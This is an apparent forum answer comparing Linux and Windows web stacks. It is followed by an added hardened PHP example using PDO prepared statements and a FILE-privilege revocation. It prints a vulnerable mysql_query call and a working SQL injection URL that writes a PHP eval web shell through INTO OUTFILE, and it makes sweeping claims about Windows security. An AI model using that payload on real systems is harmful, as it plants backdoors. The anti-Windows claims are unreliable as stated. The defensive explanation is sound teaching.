Are there any real benefits to a Linux based stack as opposed to a Windows based stack for exposing web based applications?
The answer is yes, no doubt about it. All platforms have their problems. However, Linux security systems such as SELinux and AppArmor will break exploits that Windows cannot, and I can give a great example.
It is tricky to obtain full remote code execution with MySQL. MS-SQL can allow access to xp_cmdshell(), which calls cmd.exe; this makes exploiting SQL injection a lot easier with this privilege.
To exploit a LAMP system that is vulnerable to SQL injection your best bet is to upload a .php file and try to execute it. In MySQL there are the file_priv functions, most importantly load_file() and into outfile "...". A SQL injection attack will look like this:
Vulnerable code:
mysql_query('select "name" from users where id='.$_GET[id])
The corresponding exploit code:
http://127.0.0.1/sql_inj.php?id=1 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"
This does assume that the document root is in /var/www and that the database and httpd are on the same system. The important part is that both AppArmor and SELinux will not allow MySQL to create the file /var/www/backdoor.php, and the exploit will fail.
In this case the best approach is to disallow file_priv; however, this attack pattern of creating a persistent backdoor is extremely common with other exploits. This is exactly why AppArmor and SELinux have been built: to break the exploitation process.
By contrast, Windows 2008 has absolutely no security system to stop this type of attack. Windows usually lags behind when it comes to security features; you can see this with Microsoft's slow adoption of memory protection such as canaries and ASLR.
Furthermore, Microsoft is responsible for more dangerous software bugs than any other software vendor.
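As an added example (not part of the answer above), here is the hardened form of the vulnerable mysql_query() call: the id is validated and bound as a parameter so a UNION ... INTO OUTFILE payload cannot alter the statement, and the FILE privilege is revoked from the application account as defence in depth. The DSN, the 'webapp' account and the DB_PASSWORD variable are assumptions.

```php
<?php
// Hardened replacement for: mysql_query('select "name" from users where id='.$_GET[id])
// Added example; the DSN, the 'webapp' account and DB_PASSWORD are assumptions.
declare(strict_types=1);

function connect(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=app;charset=utf8mb4',
        'webapp',
        getenv('DB_PASSWORD') ?: '',
        [
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
            // Real server-side prepared statements, not client-side emulation.
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
}

// Returns the user's name, or null if the id is missing, non-numeric or unknown.
function lookupUserName(PDO $pdo, array $query): ?string
{
    // Reject anything that is not a positive integer before it reaches MySQL.
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The id travels as a bound parameter, so it can never become part of
    // the SQL text; the statement structure is fixed at prepare time.
    $stmt = $pdo->prepare('SELECT name FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

// Defence in depth, run once by a DBA: without FILE, INTO OUTFILE and
// LOAD_FILE() fail for the web account even if an injection slips through.
// Kept as a string here so the statement is documented beside the code.
const REVOKE_FILE_PRIV = "REVOKE FILE ON *.* FROM 'webapp'@'localhost';";

$pdo = connect();
$name = lookupUserName($pdo, $_GET);
header('Content-Type: text/plain; charset=utf-8');
echo $name ?? 'not found', "\n";
```

Pair the revocation with a restrictive secure_file_priv setting in the MySQL server configuration so that file writes are confined even for accounts that legitimately hold FILE.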